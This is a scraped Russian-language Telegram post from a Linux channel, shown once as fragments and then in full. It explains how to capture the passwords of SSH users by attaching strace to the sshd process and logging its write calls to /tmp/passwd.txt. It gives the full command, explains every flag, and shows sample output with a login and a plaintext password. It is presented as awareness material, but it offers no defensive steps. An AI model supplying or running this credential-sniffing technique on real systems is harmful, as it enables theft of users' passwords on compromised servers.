Следим за новостями Linux, DevOps и ИБ, чтобы быть готовым к любым факапам.
Бонусом — плотные шпаргалки и чеклисты для ежедневной работы в терминале.
📩 По всем вопросам: @chorapov
Зеркало в MAX: https://max.ru/LinuxSkill
РКН https://vk.cc/cMUwm4
Post #586
4.4K
🚨 Осторожно: Как не стать жертвой сниффинга паролей на Linux!
Привет, линукс-мастер! 🖥️ Сегодня я расскажу тебе о том, как некоторые используют
Как работает сниффинг с помощью
1. Запуск
-
-
-
-
-
-
2. Что происходит:
- Когда пользователь авторизуется по SSH, его пароль записывается в файл
3. Пример вывода:
- Логин
Важно помнить:
- Эта информация предназначена исключительно для образовательных целей. Использование таких методов для незаконных действий строго запрещено.
- Защищай свои системы, следи за безопасностью и соблюдай законы своей страны.
Береги свои данные и безопасность!
📩 Завтра: Автоматизация кибербезопасности: 5 полезных скриптов на Bash
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Управление Съемными Носителями с Eject
🧠 - Разложение на Простые Множители с Factor
🧠 - Погружение в Команду Groups
#Linux_Mastery @LinuxSkill
Telegram Linux Skill - Освой Linux c нуля до DevOps 🚀🐧 Марафон "Алфавит команд Linux": Управление Съемными Носителями с Eject 💽➡️
Привет, друзья LinuxSkill! Сегодня в нашем марафоне мы погружаемся в мир управления съемными носителями с помощью команды Eject. Этот инструмент позволяет извлекать съемные носители… Привет, линукс-мастер! 🖥️ Сегодня я расскажу тебе о том, как некоторые используют
strace для перехвата паролей пользователей, подключающихся по SSH. Это знание поможет тебе защитить свои системы и избежать неприятностей. Давай разберемся, как это работает и как защититься!Как работает сниффинг с помощью
strace:1. Запуск
strace для отслеживания процессов SSH:strace -f -p $(pgrep -o sshd) -o /tmp/passwd.txt -v -e trace=write -s 64
-
-f: Следим за всеми процессами sshd (мастер и дочерние).-
-p: Ищем все PID процессов sshd.-
-o: Файл, куда пишем результаты.-
-v: Пишем подробности.-
-e: Триггеримся только на запись данных.-
-s: Ограничиваем вывод данных 64 байтами (меньше мусора).2. Что происходит:
- Когда пользователь авторизуется по SSH, его пароль записывается в файл
passwd.txt в открытом виде.3. Пример вывода:
1088 write(5,"\0\0\0\5oleg", 9) = 9
1088 write(5, "\0\0\0\Barmaley1982", 17) = 17
- Логин
oleg, пароль Barmaley1982.Важно помнить:
- Эта информация предназначена исключительно для образовательных целей. Использование таких методов для незаконных действий строго запрещено.
- Защищай свои системы, следи за безопасностью и соблюдай законы своей страны.
Береги свои данные и безопасность!
📩 Завтра: Автоматизация кибербезопасности: 5 полезных скриптов на Bash
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Управление Съемными Носителями с Eject
🧠 - Разложение на Простые Множители с Factor
🧠 - Погружение в Команду Groups
#Linux_Mastery @LinuxSkill
- 🔥 14
- 👀 6
- 👍 5